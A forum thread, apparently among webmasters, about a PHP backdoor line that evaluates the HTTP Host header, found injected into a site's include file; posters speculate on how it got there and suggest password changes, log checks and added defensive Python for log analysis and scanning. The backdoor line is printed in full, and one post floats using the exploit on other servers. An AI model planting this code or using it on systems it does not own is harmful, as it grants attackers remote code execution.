Found this code on my site after I signed it up with CCBILL ..
$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}
It was placed in one of my include files which is used all over.. and none of my pages were loading.. anyone got a clue what this is? |
bump...
Just talked to another guy running a CCBILL site.. he told me they're not touching ones pages what-so-ever.. so I'm like what the fuck is going on here.. |
In the parlance of our times... j00 g0t 0wn3d.
|
at least you got a reach around
Quote:
what's the rest of your code ? |
hmm doesn't make sense to me. how does eval "make sure it's good". the exit pretty much makes the whole thing a waste of time anyway. maybe they wanted to waste some cpu before screwing you with the exit :|
|
How the fuck can anyone gain access to a brand new setup at webair... the only ones knowing my ftp login is CCBILL, they got it a few hours before this happened..
|
... lots of ways
|
If what I think is true, that will allow someone to run any php code on your site that they want.
|
seems like a conspiracy
|
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP command, then dies.
It's definitely odd, as normally HTTP_HOST has your domain name in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with. |
you're not the first person
|
is it in the very top or very bottom ?
|
two of my clients reported the same thing.
It seems to be part of a botnet/DDoS tool. What I read is, that code can be sent to that host, and ask the host to execute a remote script |
Quote:
when was it modified..? and try going to google and type site:yourdomain.com and see if there are any new pages indexed you don't recognize |
How the hell can that be placed in EACH ones pages?
|
Quote:
because the server was compromised |
Uh-oh, not fun for sure...
|
As I said in other thread it's a way to do php code injection.
|
you should add a function to log hosts if they're not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes
|
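An added example, not part of the original thread: the Host logging suggested in the post above, done as a pass over access-log lines instead of inside the site's PHP. It assumes Apache is configured to log the Host header with `%{Host}i`; the allowlist, the log format and the sample lines are constructed for illustration.

```python
import re
from collections import Counter

# Assumption: the site's own names and IPs.
ALLOWED_HOSTS = {"example.com", "www.example.com", "203.0.113.10"}

# Assumed Apache format: LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Host}i\""
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                  r'(?P<status>\d{3}) \S+ "(?P<host>.*)"$')
HOSTNAME = re.compile(r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
                      r"(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*$")


def classify_host(raw):
    """'ok' for our own hosts, 'foreign' for a well-formed name that is not ours,
    'missing' for an absent header, 'malformed' for anything that is not a hostname."""
    name = re.sub(r":\d{1,5}$", "", raw.strip().lower()).rstrip(".")
    if name in ("", "-"):
        return "missing"
    if name in ALLOWED_HOSTS:
        return "ok"
    return "foreign" if HOSTNAME.match(name) else "malformed"


def suspicious_requests(lines):
    """Return (client_ip, timestamp, verdict, raw_host) for every non-'ok' request."""
    found = []
    for line in lines:
        m = LINE.match(line.strip())
        if m and (verdict := classify_host(m["host"])) != "ok":
            found.append((m["ip"], m["ts"], verdict, m["host"]))
    return found


def malformed_by_ip(lines):
    """Count malformed Host values per client IP, the trail the post suggests following."""
    return Counter(ip for ip, _, verdict, _ in suspicious_requests(lines)
                   if verdict == "malformed")


# Constructed sample log lines (documentation IP ranges; the non-hostname value is redacted).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "www.example.com"
198.51.100.7 - - [01/Jan/2024:10:01:05 +0000] "GET /join.php HTTP/1.1" 200 812 "example.com:80"
192.0.2.44 - - [01/Jan/2024:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 0 "(redacted-non-hostname-value);"
192.0.2.44 - - [01/Jan/2024:10:02:12 +0000] "GET /inc/header.php HTTP/1.1" 200 0 "(redacted-non-hostname-value);"
192.0.2.91 - - [01/Jan/2024:10:03:40 +0000] "GET / HTTP/1.1" 200 5120 "other-site.example"
""".splitlines()
```

A "malformed" Host is the interesting verdict here: a value that is not a hostname at all is what the injected line would pass to eval, while "foreign" is usually just a scanner or a stale DNS record.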
biskoppen,
This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out. |
Quote:
My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so) ICQ : 30898463 |
biskoppen,
Sorry but we don't have access to ICQ, the best way to contact us would either be email ([email protected]) or the phone numbers listed in my sig. |
Maybe your computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.
|
so... what is the status of this?
Damn CCBill doesn't have access to ICQ! Come on guys! |
Quote:
There are other sites and servers compromised, it's not only "biskoppen" |
I was going to sign up for ccbill soon too.................. watching to see how this develops
and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available. this really made a lasting impression on me |
Pretty sure it's not ccbill.
|
that makes the most sense
|
I don't get why it's not trackable through the logfiles who did this? have you disabled logging?
|
Quote:
That's interesting... Early this week I was contacted by one of my trades about a similar issue. He had gone to some site that was compromised and it had installed a keylogger on his computer. The typical virus protectors like Norton etc. didn't catch it. He was saying you needed something better like Kaspersky. These guys got his server login info and installed the same thing on his site.. Apparently they seem to have it automated so it will download all the html (probably php as well), install the exploit and re-upload them. Happens very fast. It could be that this is another "version" of that. |
Imagine how much traffic they can steal this way? just a few clicks from each site can be millions in a few days
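An added example, not part of the original thread: since the injection described above touches many files at once, this scanner walks a document root and flags every `eval(...)` whose argument comes from request data, including the one-step indirection used in the line from the first post. The function names and the file-suffix list are assumptions made for the example.

```python
import re
from pathlib import Path

# PHP superglobals filled from the request; HTTP_HOST comes from the Host header.
SOURCE = re.compile(r"\$_(?:SERVER|GET|POST|COOKIE|REQUEST)\s*\[")
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])\s*@?\s*([^;]+);")
EVAL = re.compile(r"@?\beval\s*\(([^;]*)\)\s*;", re.IGNORECASE)
VAR = re.compile(r"\$[A-Za-z_]\w*")


def _from_request(expr, tainted):
    """True if expr reads a request superglobal or an already tainted variable."""
    return bool(SOURCE.search(expr)) or any(v in tainted for v in VAR.findall(expr))


def find_tainted_eval(php_source):
    """Return eval(...) statements whose argument is request data, either
    directly or via plain variable assignments ($s = $_SERVER[...]; eval($s);)."""
    assignments = ASSIGN.findall(php_source)
    tainted, changed = set(), True
    while changed:  # propagate until no new variable becomes tainted
        changed = False
        for name, expr in assignments:
            if name not in tainted and _from_request(expr, tainted):
                tainted.add(name)
                changed = True
    return [m.group(0) for m in EVAL.finditer(php_source)
            if _from_request(m.group(1), tainted)]


def scan_tree(root, suffixes=(".php", ".inc", ".html", ".htm")):
    """Map relative path -> suspicious statements for matching files under root."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_tainted_eval(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


# The line quoted in the first post, and a constructed harmless use of HTTP_HOST.
INFECTED = "<?php $s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;} ?>"
CLEAN = "<?php $host = $_SERVER['HTTP_HOST']; echo htmlspecialchars($host); ?>"

if __name__ == "__main__":
    print(find_tainted_eval(INFECTED))  # ['@eval($s);']
    print(find_tainted_eval(CLEAN))     # []
```

This is a pattern heuristic and will miss obfuscated variants, so a clean result does not replace comparing the tree against a known-good copy.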
|
damn, almost like a person needs a separate computer for surfing and one for sensitive data and work
|
Quote:
most serious people have. |
time to change your ftp password :)
|
Here are some potential sources of infection:
1 - your own PC could be infected, anything from a keylogger to a total owning of your PC.
2 - Someone at CCBill could also have a computer with similar ownage.
3 - Your server may have been owned either remotely or server to server within your host (a real issue at times with some hosts). This could be from a CMS or similar.
Basically, sounds like you got owned pretty majorly. Start changing passwords (all passwords, all users with FTP or telnet access, the SU password, etc) and getting your hosting company to look for holes, including cron tasks, open files, extra users, odd logins, etc. Good luck. |
Quote:
FTP passwords are sent via plain/clear text. Very easy to pick them off the wire! |
Shouldn't be so hard to make a bot that removes that code on all servers it can find, since you can use the exploit to remove the exploit. Maybe have it send the admin an email that the server has been compromised before removing it. I don't have the time, but maybe smokey can do it?
|